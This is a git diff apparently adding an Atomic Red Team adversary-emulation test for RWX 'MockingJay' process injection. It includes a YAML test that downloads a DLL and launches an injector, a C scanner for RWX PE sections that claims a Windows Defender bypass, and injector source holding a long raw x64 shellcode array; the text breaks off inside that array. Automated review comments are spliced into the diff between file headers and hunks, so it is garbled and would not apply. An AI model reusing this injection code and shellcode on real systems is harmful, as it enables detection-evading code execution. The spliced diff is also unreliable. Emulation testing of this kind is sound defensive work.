diff --git a/atomics/T1055/T1055.yaml b/atomics/T1055/T1055.yaml
index c5a2ee2c7e..6de0d7d9ba 100644
--- a/atomics/T1055/T1055.yaml
+++ b/atomics/T1055/T1055.yaml
@@ -129,3 +129,36 @@ atomic_tests:
 cleanup_command: 'Get-Process -Name calc, CalculatorApp -ErrorAction SilentlyContinue | Stop-Process -Force'
 name: powershell
 elevation_required: false
+- name: Read-Write-Execute process Injection
+ auto_generated_guid: 49543237-25db-497b-90df-d0a0a6e8fe2c
+ description: |
+ This test exploited the vulnerability in legitimate PE formats where sections have RWX permission and enough space for shellcode.
+ The RWX injection avoided the use of VirtualAlloc, WriteVirtualMemory, and ProtectVirtualMemory, thus evading detection mechanisms
+ that relied on API call sequences and heuristics. The RWX injection utilises API call sequences: LoadLibrary --> GetModuleInformation --> GetModuleHandleA --> RtlCopyMemory --> CreateThread.
+ The injected shellcode will open a message box and a notepad.
+ RWX Process Injection, also known as MockingJay, was introduced to the security community by SecurityJoes.
+ More details can be found at https://www.securityjoes.com/post/process-mockingjay-echoing-rwx-in-userland-to-achieve-code-execution.
+ The original injector and idea were developed for game cheats, as visible at https://github.com/M-r-J-o-h-n/SWH-Injector.
+ supported_platforms:
+ - windows
+ input_arguments:
+ vuln_dll:
+ description: vulnerable DLL
+ type: path
+ default: PathToAtomicsFolder\T1055\bin\x64\vuln_dll\msys-2.0.dll
+ dependency_executor_name: powershell
+ dependencies:
+ - description: |
+ Utility to inject must exist on disk at specified location (#{vuln_dll})
+ prereq_command: |
+ if (Test-Path "#{vuln_dll}") {exit 0} else {exit 1}
+ get_prereq_command: |
+ New-Item -Type Directory (split-path "#{vuln_dll}") -ErrorAction ignore | Out-Null
+ Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1055/bin/x64/vuln_dll/msys-2.0.dll" -OutFile "#{vuln_dll}"
+ executor:
+ command: |
+ $address = (& "$PathToAtomicsFolder\T1055\bin\x64\searchVuln.exe" "$PathToAtomicsFolder\T1055\bin\x64\vuln_dll\" | Out-String | Select-String -Pattern "VirtualAddress: (\w+)").Matches.Groups[1].Value
+ & "PathToAtomicsFolder\T1055\bin\x64\RWXinjectionLocal.exe" "#{vuln_dll}" $address
+ cleanup_command: 'Get-Process -Name Notepad -ErrorAction SilentlyContinue | Stop-Process -Force'
+ name: powershell
+ elevation_required: true
diff --git a/atomics/T1055/bin/x64/RWXinjectionLocal.exe b/atomics/T1055/bin/x64/RWXinjectionLocal.exe
new file mode 100644
index 0000000000..27cc61dfd8
Binary files /dev/null and b/atomics/T1055/bin/x64/RWXinjectionLocal.exe differ
diff --git a/atomics/T1055/bin/x64/searchVuln.exe b/atomics/T1055/bin/x64/searchVuln.exe
new file mode 100644
index 0000000000..c370eae463
Binary files /dev/null and b/atomics/T1055/bin/x64/searchVuln.exe differ
diff --git a/atomics/T1055/bin/x64/vuln_dll/msys-2.0.dll b/atomics/T1055/bin/x64/vuln_dll/msys-2.0.dll
new file mode 100644
index 0000000000..ab784f8306
Binary files /dev/null and b/atomics/T1055/bin/x64/vuln_dll/msys-2.0.dll differ
diff --git a/atomics/T1055/src/x64/RWXInjection/build.bat b/atomics/T1055/src/x64/RWXInjection/build.bat
new file mode 100644
index 0000000000..7af5427143
--- /dev/null
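Review bot: The second executor line runs `& "PathToAtomicsFolder\T1055\bin\x64\RWXinjectionLocal.exe"` without the `$` that the first line puts on `$PathToAtomicsFolder`, so PowerShell resolves a literal relative path that does not exist and the injector never launches; it should read `& "$PathToAtomicsFolder\T1055\bin\x64\RWXinjectionLocal.exe" "#{vuln_dll}" $address`. The section offset is also computed over the hard-coded `...\bin\x64\vuln_dll\` directory rather than the directory of `#{vuln_dll}`, so a user who overrides the input argument silently pairs an offset from one DLL with a different DLL; passing `(split-path "#{vuln_dll}")` to searchVuln.exe keeps the two in step. Separately, if the shipped searchVuln.exe is built from the path_finder.c in this commit, its output line is `VirtualAddress (sec offset): 0x...`, which the pattern `VirtualAddress: (\w+)` will not match and `$address` will be empty — worth confirming against the binary. The dependency description says "Utility to inject" but the path it checks is the vulnerable DLL; `Vulnerable DLL must exist on disk at specified location (#{vuln_dll})` would be accurate.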
+++ b/atomics/T1055/src/x64/RWXInjection/build.bat
@@ -0,0 +1 @@
+cl.exe /nologo /Ox /MT /W0 /GS- /DNDEBUG /LocalInjection.c /link Psapi.lib /OUT:RWXinjectionLocal.exe /SUBSYSTEM:CONSOLE /MACHINE:x64
diff --git a/atomics/T1055/src/x64/RWXInjection/path_finder.c b/atomics/T1055/src/x64/RWXInjection/path_finder.c
new file mode 100644
index 0000000000..dfcc59d0a5
--- /dev/null
+++ b/atomics/T1055/src/x64/RWXInjection/path_finder.c
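Review bot: The compile line names the source as `/LocalInjection.c`, which cl.exe parses as an (unknown) option because of the leading slash, and no file of that name is added by this commit — the injector source is `rwx_local.c` — so the batch file cannot reproduce the shipped RWXinjectionLocal.exe as written; it should be `cl.exe /nologo /Ox /MT /W3 /DNDEBUG rwx_local.c /link Psapi.lib /OUT:RWXinjectionLocal.exe /SUBSYSTEM:CONSOLE /MACHINE:x64`. There is also no build line for searchVuln.exe, whose source (path_finder.c) links against Wintrust; adding `cl.exe /nologo /Ox /MT /W3 path_finder.c /link Wintrust.lib /OUT:searchVuln.exe /SUBSYSTEM:CONSOLE /MACHINE:x64` lets reviewers rebuild both binaries from the committed sources. `/GS-` disables stack-cookie checks and `/W0` silences every warning; unless the cookie-check imports are being avoided deliberately, neither is needed for a test harness and dropping them is the safer default.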
@@ -0,0 +1,207 @@ +/** +Author: Thomas X Meng +The code scans for PE sections with WRX permission. It does it sequentially which +is not as efficient as parallel processing. I did not find a equivalent 3rd lib in C as pefile +Windows defender bypassed, engine Version: 1.1.23100.2009 +**/ + +#include <windows.h> +#include <stdio.h> +#include <wintrust.h> +#include <softpub.h> + +// Define the GUID for WinVerifyTrust action if it is not already defined. +#ifndef WINTRUST_ACTION_GENERIC_VERIFY_V2 +#define WINTRUST_ACTION_GENERIC_VERIFY_V2 \ +{ 0xaac56b, 0xcd44, 0x11d0, { 0x8c, 0xc2, 0x0, 0xc0, 0x4f, 0xc2, 0x95, 0xee } } +#endif + +GUID WVTPolicyGUID = WINTRUST_ACTION_GENERIC_VERIFY_V2; + +#define MAX_SECTION_NAME_LEN 8 + +// Prototypes +const char* GetPEArchitecture(WORD machine); +BOOL IsSigned(LPCWSTR filepath); + +typedef struct { + char name[MAX_SECTION_NAME_LEN + 1]; // Plus null terminator + DWORD offset; + DWORD size; + DWORD raw_size; +} RWXSection; + +// Add this function to check for architecture +const char* GetPEArchitecture(WORD machine) { + switch(machine) { + case IMAGE_FILE_MACHINE_I386: + return "x86"; + case IMAGE_FILE_MACHINE_AMD64: + return "x64"; + // Add other architectures as needed + default: + return "Unknown"; + } +} + +BOOL IsSigned(LPCWSTR filepath) { + LONG lStatus; // Declare lStatus here, once + DWORD dwLastError; + + // Initialize the WINTRUST_FILE_INFO structure. + WINTRUST_FILE_INFO FileData; + memset(&FileData, 0, sizeof(FileData)); + FileData.cbStruct = sizeof(WINTRUST_FILE_INFO); + FileData.pcwszFilePath = filepath; + FileData.hFile = NULL; + FileData.pgKnownSubject = NULL; + + // Initialize the WINTRUST_DATA structure. 
+ WINTRUST_DATA WinTrustData; + memset(&WinTrustData, 0, sizeof(WinTrustData)); + WinTrustData.cbStruct = sizeof(WinTrustData); + WinTrustData.pPolicyCallbackData = NULL; + WinTrustData.pSIPClientData = NULL; + WinTrustData.dwUIChoice = WTD_UI_NONE; + WinTrustData.fdwRevocationChecks = WTD_REVOKE_NONE; + WinTrustData.dwUnionChoice = WTD_CHOICE_FILE; + WinTrustData.dwStateAction = WTD_STATEACTION_VERIFY; + WinTrustData.hWVTStateData = NULL; + WinTrustData.pwszURLReference = NULL; + WinTrustData.dwProvFlags = WTD_USE_DEFAULT_OSVER_CHECK; + WinTrustData.dwUIContext = 0; + WinTrustData.pFile = &FileData; + + // Use the WinVerifyTrust function to check the signature. + lStatus = WinVerifyTrust(NULL, &WVTPolicyGUID, &WinTrustData); + + dwLastError = GetLastError(); + + // Any value other than zero indicates that there is no signature. + if (lStatus != ERROR_SUCCESS) { + SetLastError(dwLastError); + WinTrustData.dwStateAction = WTD_STATEACTION_CLOSE; + WinVerifyTrust(NULL, &WVTPolicyGUID, &WinTrustData); // Use WVTPolicyGUID + return FALSE; + } + + // Cleanup after the trust verification is done. 
+ WinTrustData.dwStateAction = WTD_STATEACTION_CLOSE; + WinVerifyTrust(NULL, &WVTPolicyGUID, &WinTrustData); // Use WVTPolicyGUID again + return TRUE; +} + + +void checkSectionCharacteristics(PIMAGE_SECTION_HEADER section, RWXSection* rwxSection, const char* filePath) { + if ((section->Characteristics & IMAGE_SCN_MEM_EXECUTE) && + (section->Characteristics & IMAGE_SCN_MEM_READ) && + (section->Characteristics & IMAGE_SCN_MEM_WRITE)) { + // Make sure to null-terminate the name + strncpy(rwxSection->name, (const char*)section->Name, IMAGE_SIZEOF_SHORT_NAME); + rwxSection->name[IMAGE_SIZEOF_SHORT_NAME] = '\0'; + + rwxSection->offset = section->VirtualAddress; + rwxSection->size = section->Misc.VirtualSize; + rwxSection->raw_size = section->SizeOfRawData; + + // Print section info with file path + printf("[+] File: %s\n", filePath); + printf("[+] RWX Section Found: %s\n", rwxSection->name); + printf("[+] VirtualAddress (sec offset): 0x%X\n", rwxSection->offset); + printf("[+] VirtualSize: 0x%X\n", rwxSection->size); + printf("[+] SizeOfRawData: 0x%X\n", rwxSection->raw_size); + } +} + + +// Updated ProcessFile function +void ProcessFile(const char* filePath) { + HANDLE hFile = CreateFileA(filePath, GENERIC_READ, FILE_SHARE_READ, NULL, OPEN_EXISTING, 0, NULL); + if (hFile == INVALID_HANDLE_VALUE) { + printf("[-] Could not open file %s. Error: %d\n", filePath, GetLastError()); + return; + } + + HANDLE hMapping = CreateFileMapping(hFile, NULL, PAGE_READONLY, 0, 0, NULL); + if (hMapping == NULL) { + printf("[-] Could not create file mapping for %s. Error: %d\n", filePath, GetLastError()); + CloseHandle(hFile); + return; + } + + LPVOID lpBase = MapViewOfFile(hMapping, FILE_MAP_READ, 0, 0, 0); + if (lpBase == NULL) { + printf("[-] Could not map view of file %s. 
Error: %d\n", filePath, GetLastError()); + CloseHandle(hMapping); + CloseHandle(hFile); + return; + } + + PIMAGE_DOS_HEADER dosHeader = (PIMAGE_DOS_HEADER)lpBase; + if (dosHeader->e_magic != IMAGE_DOS_SIGNATURE) { + printf("[-] File %s is not a valid PE file.\n", filePath); + UnmapViewOfFile(lpBase); + CloseHandle(hMapping); + CloseHandle(hFile); + return; + } + + PIMAGE_NT_HEADERS ntHeaders = (PIMAGE_NT_HEADERS)((DWORD_PTR)lpBase + dosHeader->e_lfanew); + if (ntHeaders->Signature != IMAGE_NT_SIGNATURE) { + printf("[-] File %s is not a valid PE file.\n", filePath); + UnmapViewOfFile(lpBase); + CloseHandle(hMapping); + CloseHandle(hFile); + return; + } + + // Print the PE file architecture + printf("[+] Architecture: %s\n", GetPEArchitecture(ntHeaders->FileHeader.Machine)); + + // Check and print if the file is digitally signed + wchar_t wFilePath[MAX_PATH]; + mbstowcs(wFilePath, filePath, MAX_PATH); + printf("[+] Signed: %s\n", IsSigned(wFilePath) ? "Yes" : "No"); + + // Process the sections + PIMAGE_SECTION_HEADER sectionHeaders = IMAGE_FIRST_SECTION(ntHeaders); + RWXSection rwxSection; + + for (int i = 0; i < ntHeaders->FileHeader.NumberOfSections; ++i) { + checkSectionCharacteristics(§ionHeaders[i], &rwxSection, filePath); + } + // Cleanup + UnmapViewOfFile(lpBase); + CloseHandle(hMapping); + CloseHandle(hFile); +} + +int main(int argc, char* argv[]) { + if (argc != 2) { + printf("[+] Usage: %s <directory>\n", argv[0]); + return 1; + } + + char* directoryPath = argv[1]; + char searchPath[MAX_PATH]; + snprintf(searchPath, sizeof(searchPath), "%s\\*.*", directoryPath); + + WIN32_FIND_DATA findFileData; + HANDLE hFind = FindFirstFile(searchPath, &findFileData); + + if (hFind == INVALID_HANDLE_VALUE) { + printf("[-] Unable to find files in directory %s. 
Error is %u\n", directoryPath, GetLastError()); + return 1; + } + + do { + if (!(findFileData.dwFileAttributes & FILE_ATTRIBUTE_DIRECTORY)) { + char filePath[MAX_PATH]; + snprintf(filePath, sizeof(filePath), "%s\\%s", directoryPath, findFileData.cFileName); + ProcessFile(filePath); + } + } while (FindNextFile(hFind, &findFileData) != 0); + + FindClose(hFind); + return 0; +} //25519 \ No newline at end of file diff --git a/atomics/T1055/src/x64/RWXInjection/rwx_local.c b/atomics/T1055/src/x64/RWXInjection/rwx_local.c new file mode 100644 index 0000000000..78999813db --- /dev/null +++ b/atomics/T1055/src/x64/RWXInjection/rwx_local.c 
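Review bot: ProcessFile trusts `dosHeader->e_lfanew` and `FileHeader.NumberOfSections` without comparing either against the size of the mapped file, so a truncated or crafted file in the scanned directory (main feeds every non-directory entry to it) makes the NT-header and section-header reads run past the end of the view and crash the scanner. The mapped size is available from GetFileSizeEx right after CreateFileA; the rewrite below checks the DOS header, the e_lfanew range and the section table against it before dereferencing. Two smaller points in the same hunk: the `mbstowcs` return value is not checked, so on a conversion failure `wFilePath` is passed uninitialized to WinVerifyTrust (`if (mbstowcs(wFilePath, filePath, MAX_PATH) == (size_t)-1) { ... }`), and the comment in IsSigned "Any value other than zero indicates that there is no signature" is inaccurate — `TRUST_E_NOSIGNATURE` is the no-signature case, while other non-zero statuses mean signed-but-untrusted, so "Signed: No" conflates the two; the comment should say `// Non-zero: unsigned, or signed but not trusted under the default policy`.

```c
void ProcessFile(const char* filePath) {
    HANDLE hFile = CreateFileA(filePath, GENERIC_READ, FILE_SHARE_READ, NULL, OPEN_EXISTING, 0, NULL);
    // … unchanged: open-failure handling …
    LARGE_INTEGER fileSize;
    if (!GetFileSizeEx(hFile, &fileSize) || fileSize.QuadPart < (LONGLONG)sizeof(IMAGE_DOS_HEADER)) {
        printf("[-] File %s is too small to be a PE file.\n", filePath);
        CloseHandle(hFile);
        return;
    }
    // … unchanged: CreateFileMapping / MapViewOfFile / e_magic check …
    LONG e_lfanew = dosHeader->e_lfanew;
    if (e_lfanew < 0 || (ULONGLONG)e_lfanew + sizeof(IMAGE_NT_HEADERS) > (ULONGLONG)fileSize.QuadPart) {
        printf("[-] File %s has an out-of-range e_lfanew.\n", filePath);
        // … unchanged: unmap/close/return …
    }
    PIMAGE_NT_HEADERS ntHeaders = (PIMAGE_NT_HEADERS)((DWORD_PTR)lpBase + e_lfanew);
    // … unchanged: Signature check, architecture print, IsSigned …
    ULONGLONG sectionsEnd = (ULONGLONG)e_lfanew + FIELD_OFFSET(IMAGE_NT_HEADERS, OptionalHeader)
                          + ntHeaders->FileHeader.SizeOfOptionalHeader
                          + (ULONGLONG)ntHeaders->FileHeader.NumberOfSections * sizeof(IMAGE_SECTION_HEADER);
    if (sectionsEnd > (ULONGLONG)fileSize.QuadPart) {
        printf("[-] File %s declares section headers past end of file.\n", filePath);
        // … unchanged: unmap/close/return …
    }
    // … unchanged: section loop and cleanup …
}
```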
@@ -0,0 +1,521 @@ +/** +Author: Thomas X Meng +Atomic Red Team +RWX Process Injection code, AKA MockingJay +reference: SecurityJoes, +https://www.securityjoes.com/post/process-mockingjay-echoing-rwx-in-userland-to-achieve-code-execution +No memory allocation or permission settings APIs. +**/ + +#include <windows.h> +#include <psapi.h> +#include <stdio.h> +#include <stdlib.h> + +// Define the structure to hold section information +typedef struct { + LPVOID startSecAddress; + LPVOID endSecAddress; +} SectionDescriptor; + +unsigned char shellcode[] = + { + 0x40,0x55,0x57,0x48,0x81,0xec,0x78,0x05,0x00,0x00, + 0x48,0x8d,0x6c,0x24,0x60,0x65,0x48,0x8b,0x04,0x25, + 0x60,0x00,0x00,0x00,0x48,0x89,0x45,0x00,0x48,0x8b, + 0x45,0x00,0x48,0x8b,0x40,0x18,0x48,0x89,0x45,0x08, + 0x48,0x8b,0x45,0x08,0xc6,0x40,0x48,0x00,0x48,0x8b, + 0x45,0x00,0x48,0x8b,0x40,0x18,0x48,0x83,0xc0,0x20, + 0x48,0x89,0x85,0xb0,0x02,0x00,0x00,0x48,0x8b,0x85, + 0xb0,0x02,0x00,0x00,0x48,0x8b,0x00,0x48,0x89,0x85, + 0xb8,0x02,0x00,0x00,0x48,0xb8,0x6b,0x00,0x65,0x00, + 0x72,0x00,0x6e,0x00,0x48,0x89,0x45,0x38,0x48,0xb8, + 0x65,0x00,0x6c,0x00,0x33,0x00,0x32,0x00,0x48,0x89, + 0x45,0x40,0x48,0xb8,0x2e,0x00,0x64,0x00,0x6c,0x00, + 0x6c,0x00,0x48,0x89,0x45,0x48,0x48,0xc7,0x45,0x50, + 0x00,0x00,0x00,0x00,0x48,0xc7,0x85,0xd0,0x02,0x00, + 0x00,0x00,0x00,0x00,0x00,0x48,0x8b,0x85,0xb0,0x02, + 0x00,0x00,0x48,0x8b,0x00,0x48,0x89,0x85,0xb8,0x02, + 0x00,0x00,0x48,0x8b,0x85,0xb8,0x02,0x00,0x00,0x48, + 0x83,0xe8,0x10,0x48,0x89,0x85,0xd8,0x02,0x00,0x00, + 0xc7,0x85,0xe0,0x02,0x00,0x00,0x00,0x00,0x00,0x00, + 0x48,0x8b,0x85,0xd8,0x02,0x00,0x00,0x48,0x8b,0x40, + 0x60,0x48,0x89,0x85,0xc8,0x02,0x00,0x00,0x48,0x8d, + 0x45,0x38,0x48,0x89,0x85,0xc0,0x02,0x00,0x00,0xc7, + 0x85,0xe0,0x02,0x00,0x00,0x01,0x00,0x00,0x00,0x48, + 0x8b,0x85,0xc8,0x02,0x00,0x00,0x0f,0xb7,0x00,0x85, + 0xc0,0x75,0x0f,0xc7,0x85,0xe0,0x02,0x00,0x00,0x00, + 0x00,0x00,0x00,0xe9,0x2e,0x01,0x00,0x00,0x48,0x8b, + 0x85,0xc8,0x02,0x00,0x00,0x0f,0xb6,0x00,0x88,0x85, + 
0xe4,0x02,0x00,0x00,0x48,0x8b,0x85,0xc8,0x02,0x00, + 0x00,0x0f,0xb7,0x00,0x3d,0xff,0x00,0x00,0x00,0x7e, + 0x13,0x48,0x8b,0x85,0xc8,0x02,0x00,0x00,0x0f,0xb7, + 0x00,0x66,0x89,0x85,0xe8,0x02,0x00,0x00,0xeb,0x46, + 0x0f,0xbe,0x85,0xe4,0x02,0x00,0x00,0x83,0xf8,0x41, + 0x7c,0x1e,0x0f,0xbe,0x85,0xe4,0x02,0x00,0x00,0x83, + 0xf8,0x5a,0x7f,0x12,0x0f,0xbe,0x85,0xe4,0x02,0x00, + 0x00,0x83,0xc0,0x20,0x88,0x85,0xe5,0x02,0x00,0x00, + 0xeb,0x0d,0x0f,0xb6,0x85,0xe4,0x02,0x00,0x00,0x88, + 0x85,0xe5,0x02,0x00,0x00,0x66,0x0f,0xbe,0x85,0xe5, + 0x02,0x00,0x00,0x66,0x89,0x85,0xe8,0x02,0x00,0x00, + 0x48,0x8b,0x85,0xc0,0x02,0x00,0x00,0x0f,0xb6,0x00, + 0x88,0x85,0xe4,0x02,0x00,0x00,0x48,0x8b,0x85,0xc0, + 0x02,0x00,0x00,0x0f,0xb7,0x00,0x3d,0xff,0x00,0x00, + 0x00,0x7e,0x13,0x48,0x8b,0x85,0xc0,0x02,0x00,0x00, + 0x0f,0xb7,0x00,0x66,0x89,0x85,0xec,0x02,0x00,0x00, + 0xeb,0x46,0x0f,0xbe,0x85,0xe4,0x02,0x00,0x00,0x83, + 0xf8,0x41,0x7c,0x1e,0x0f,0xbe,0x85,0xe4,0x02,0x00, + 0x00,0x83,0xf8,0x5a,0x7f,0x12,0x0f,0xbe,0x85,0xe4, + 0x02,0x00,0x00,0x83,0xc0,0x20,0x88,0x85,0xe5,0x02, + 0x00,0x00,0xeb,0x0d,0x0f,0xb6,0x85,0xe4,0x02,0x00, + 0x00,0x88,0x85,0xe5,0x02,0x00,0x00,0x66,0x0f,0xbe, + 0x85,0xe5,0x02,0x00,0x00,0x66,0x89,0x85,0xec,0x02, + 0x00,0x00,0x48,0x8b,0x85,0xc8,0x02,0x00,0x00,0x48, + 0x83,0xc0,0x02,0x48,0x89,0x85,0xc8,0x02,0x00,0x00, + 0x48,0x8b,0x85,0xc0,0x02,0x00,0x00,0x48,0x83,0xc0, + 0x02,0x48,0x89,0x85,0xc0,0x02,0x00,0x00,0x0f,0xb7, + 0x85,0xe8,0x02,0x00,0x00,0x0f,0xb7,0x8d,0xec,0x02, + 0x00,0x00,0x3b,0xc1,0x0f,0x84,0xb5,0xfe,0xff,0xff, + 0x83,0xbd,0xe0,0x02,0x00,0x00,0x00,0x0f,0x84,0x2e, + 0x01,0x00,0x00,0x48,0x8b,0x85,0xc8,0x02,0x00,0x00, + 0x48,0x83,0xe8,0x02,0x48,0x89,0x85,0xc8,0x02,0x00, + 0x00,0x48,0x8b,0x85,0xc0,0x02,0x00,0x00,0x48,0x83, + 0xe8,0x02,0x48,0x89,0x85,0xc0,0x02,0x00,0x00,0x48, + 0x8b,0x85,0xc8,0x02,0x00,0x00,0x0f,0xb6,0x00,0x88, + 0x85,0xe4,0x02,0x00,0x00,0x48,0x8b,0x85,0xc8,0x02, + 0x00,0x00,0x0f,0xb7,0x00,0x3d,0xff,0x00,0x00,0x00, + 
0x7e,0x13,0x48,0x8b,0x85,0xc8,0x02,0x00,0x00,0x0f, + 0xb7,0x00,0x66,0x89,0x85,0xe8,0x02,0x00,0x00,0xeb, + 0x46,0x0f,0xbe,0x85,0xe4,0x02,0x00,0x00,0x83,0xf8, + 0x41,0x7c,0x1e,0x0f,0xbe,0x85,0xe4,0x02,0x00,0x00, + 0x83,0xf8,0x5a,0x7f,0x12,0x0f,0xbe,0x85,0xe4,0x02, + 0x00,0x00,0x83,0xc0,0x20,0x88,0x85,0xe5,0x02,0x00, + 0x00,0xeb,0x0d,0x0f,0xb6,0x85,0xe4,0x02,0x00,0x00, + 0x88,0x85,0xe5,0x02,0x00,0x00,0x66,0x0f,0xbe,0x85, + 0xe5,0x02,0x00,0x00,0x66,0x89,0x85,0xe8,0x02,0x00, + 0x00,0x48,0x8b,0x85,0xc0,0x02,0x00,0x00,0x0f,0xb6, + 0x00,0x88,0x85,0xe4,0x02,0x00,0x00,0x48,0x8b,0x85, + 0xc0,0x02,0x00,0x00,0x0f,0xb7,0x00,0x3d,0xff,0x00, + 0x00,0x00,0x7e,0x13,0x48,0x8b,0x85,0xc0,0x02,0x00, + 0x00,0x0f,0xb7,0x00,0x66,0x89,0x85,0xec,0x02,0x00, + 0x00,0xeb,0x46,0x0f,0xbe,0x85,0xe4,0x02,0x00,0x00, + 0x83,0xf8,0x41,0x7c,0x1e,0x0f,0xbe,0x85,0xe4,0x02, + 0x00,0x00,0x83,0xf8,0x5a,0x7f,0x12,0x0f,0xbe,0x85, + 0xe4,0x02,0x00,0x00,0x83,0xc0,0x20,0x88,0x85,0xe5, + 0x02,0x00,0x00,0xeb,0x0d,0x0f,0xb6,0x85,0xe4,0x02, + 0x00,0x00,0x88,0x85,0xe5,0x02,0x00,0x00,0x66,0x0f, + 0xbe,0x85,0xe5,0x02,0x00,0x00,0x66,0x89,0x85,0xec, + 0x02,0x00,0x00,0x0f,0xb7,0x85,0xe8,0x02,0x00,0x00, + 0x0f,0xb7,0x8d,0xec,0x02,0x00,0x00,0x2b,0xc1,0x89, + 0x85,0xe0,0x02,0x00,0x00,0x83,0xbd,0xe0,0x02,0x00, + 0x00,0x00,0x75,0x10,0x48,0x8b,0x85,0xd8,0x02,0x00, + 0x00,0x48,0x89,0x85,0xd0,0x02,0x00,0x00,0xeb,0x25, + 0x48,0x8b,0x85,0xb8,0x02,0x00,0x00,0x48,0x8b,0x00, + 0x48,0x89,0x85,0xb8,0x02,0x00,0x00,0x48,0x8b,0x85, + 0xb0,0x02,0x00,0x00,0x48,0x39,0x85,0xb8,0x02,0x00, + 0x00,0x0f,0x85,0xf9,0xfc,0xff,0xff,0x48,0x8b,0x85, + 0xd0,0x02,0x00,0x00,0x48,0x89,0x85,0xf0,0x02,0x00, + 0x00,0x48,0xb8,0x6e,0x00,0x74,0x00,0x64,0x00,0x6c, + 0x00,0x48,0x89,0x45,0x38,0x48,0xb8,0x6c,0x00,0x2e, + 0x00,0x64,0x00,0x6c,0x00,0x48,0x89,0x45,0x40,0x48, + 0xc7,0x45,0x48,0x6c,0x00,0x00,0x00,0x48,0xc7,0x45, + 0x50,0x00,0x00,0x00,0x00,0x48,0xc7,0x85,0xf8,0x02, + 0x00,0x00,0x00,0x00,0x00,0x00,0x48,0x8b,0x85,0xb0, + 
0x02,0x00,0x00,0x48,0x8b,0x00,0x48,0x89,0x85,0xb8, + 0x02,0x00,0x00,0x48,0x8b,0x85,0xb8,0x02,0x00,0x00, + 0x48,0x83,0xe8,0x10,0x48,0x89,0x85,0x00,0x03,0x00, + 0x00,0xc7,0x85,0x08,0x03,0x00,0x00,0x00,0x00,0x00, + 0x00,0x48,0x8b,0x85,0x00,0x03,0x00,0x00,0x48,0x8b, + 0x40,0x60,0x48,0x89,0x85,0xc8,0x02,0x00,0x00,0x48, + 0x8d,0x45,0x38,0x48,0x89,0x85,0xc0,0x02,0x00,0x00, + 0xc7,0x85,0x08,0x03,0x00,0x00,0x01,0x00,0x00,0x00, + 0x48,0x8b,0x85,0xc8,0x02,0x00,0x00,0x0f,0xb7,0x00, + 0x85,0xc0,0x75,0x0f,0xc7,0x85,0x08,0x03,0x00,0x00, + 0x00,0x00,0x00,0x00,0xe9,0x2e,0x01,0x00,0x00,0x48, + 0x8b,0x85,0xc8,0x02,0x00,0x00,0x0f,0xb6,0x00,0x88, + 0x85,0x0c,0x03,0x00,0x00,0x48,0x8b,0x85,0xc8,0x02, + 0x00,0x00,0x0f,0xb7,0x00,0x3d,0xff,0x00,0x00,0x00, + 0x7e,0x13,0x48,0x8b,0x85,0xc8,0x02,0x00,0x00,0x0f, + 0xb7,0x00,0x66,0x89,0x85,0x10,0x03,0x00,0x00,0xeb, + 0x46,0x0f,0xbe,0x85,0x0c,0x03,0x00,0x00,0x83,0xf8, + 0x41,0x7c,0x1e,0x0f,0xbe,0x85,0x0c,0x03,0x00,0x00, + 0x83,0xf8,0x5a,0x7f,0x12,0x0f,0xbe,0x85,0x0c,0x03, + 0x00,0x00,0x83,0xc0,0x20,0x88,0x85,0x0d,0x03,0x00, + 0x00,0xeb,0x0d,0x0f,0xb6,0x85,0x0c,0x03,0x00,0x00, + 0x88,0x85,0x0d,0x03,0x00,0x00,0x66,0x0f,0xbe,0x85, + 0x0d,0x03,0x00,0x00,0x66,0x89,0x85,0x10,0x03,0x00, + 0x00,0x48,0x8b,0x85,0xc0,0x02,0x00,0x00,0x0f,0xb6, + 0x00,0x88,0x85,0x0c,0x03,0x00,0x00,0x48,0x8b,0x85, + 0xc0,0x02,0x00,0x00,0x0f,0xb7,0x00,0x3d,0xff,0x00, + 0x00,0x00,0x7e,0x13,0x48,0x8b,0x85,0xc0,0x02,0x00, + 0x00,0x0f,0xb7,0x00,0x66,0x89,0x85,0x14,0x03,0x00, + 0x00,0xeb,0x46,0x0f,0xbe,0x85,0x0c,0x03,0x00,0x00, + 0x83,0xf8,0x41,0x7c,0x1e,0x0f,0xbe,0x85,0x0c,0x03, + 0x00,0x00,0x83,0xf8,0x5a,0x7f,0x12,0x0f,0xbe,0x85, + 0x0c,0x03,0x00,0x00,0x83,0xc0,0x20,0x88,0x85,0x0d, + 0x03,0x00,0x00,0xeb,0x0d,0x0f,0xb6,0x85,0x0c,0x03, + 0x00,0x00,0x88,0x85,0x0d,0x03,0x00,0x00,0x66,0x0f, + 0xbe,0x85,0x0d,0x03,0x00,0x00,0x66,0x89,0x85,0x14, + 0x03,0x00,0x00,0x48,0x8b,0x85,0xc8,0x02,0x00,0x00, + 0x48,0x83,0xc0,0x02,0x48,0x89,0x85,0xc8,0x02,0x00, + 
0x00,0x48,0x8b,0x85,0xc0,0x02,0x00,0x00,0x48,0x83, + 0xc0,0x02,0x48,0x89,0x85,0xc0,0x02,0x00,0x00,0x0f, + 0xb7,0x85,0x10,0x03,0x00,0x00,0x0f,0xb7,0x8d,0x14, + 0x03,0x00,0x00,0x3b,0xc1,0x0f,0x84,0xb5,0xfe,0xff, + 0xff,0x83,0xbd,0x08,0x03,0x00,0x00,0x00,0x0f,0x84, + 0x2e,0x01,0x00,0x00,0x48,0x8b,0x85,0xc8,0x02,0x00, + 0x00,0x48,0x83,0xe8,0x02,0x48,0x89,0x85,0xc8,0x02, + 0x00,0x00,0x48,0x8b,0x85,0xc0,0x02,0x00,0x00,0x48, + 0x83,0xe8,0x02,0x48,0x89,0x85,0xc0,0x02,0x00,0x00, + 0x48,0x8b,0x85,0xc8,0x02,0x00,0x00,0x0f,0xb6,0x00, + 0x88,0x85,0x0c,0x03,0x00,0x00,0x48,0x8b,0x85,0xc8, + 0x02,0x00,0x00,0x0f,0xb7,0x00,0x3d,0xff,0x00,0x00, + 0x00,0x7e,0x13,0x48,0x8b,0x85,0xc8,0x02,0x00,0x00, + 0x0f,0xb7,0x00,0x66,0x89,0x85,0x10,0x03,0x00,0x00, + 0xeb,0x46,0x0f,0xbe,0x85,0x0c,0x03,0x00,0x00,0x83, + 0xf8,0x41,0x7c,0x1e,0x0f,0xbe,0x85,0x0c,0x03,0x00, + 0x00,0x83,0xf8,0x5a,0x7f,0x12,0x0f,0xbe,0x85,0x0c, + 0x03,0x00,0x00,0x83,0xc0,0x20,0x88,0x85,0x0d,0x03, + 0x00,0x00,0xeb,0x0d,0x0f,0xb6,0x85,0x0c,0x03,0x00, + 0x00,0x88,0x85,0x0d,0x03,0x00,0x00,0x66,0x0f,0xbe, + 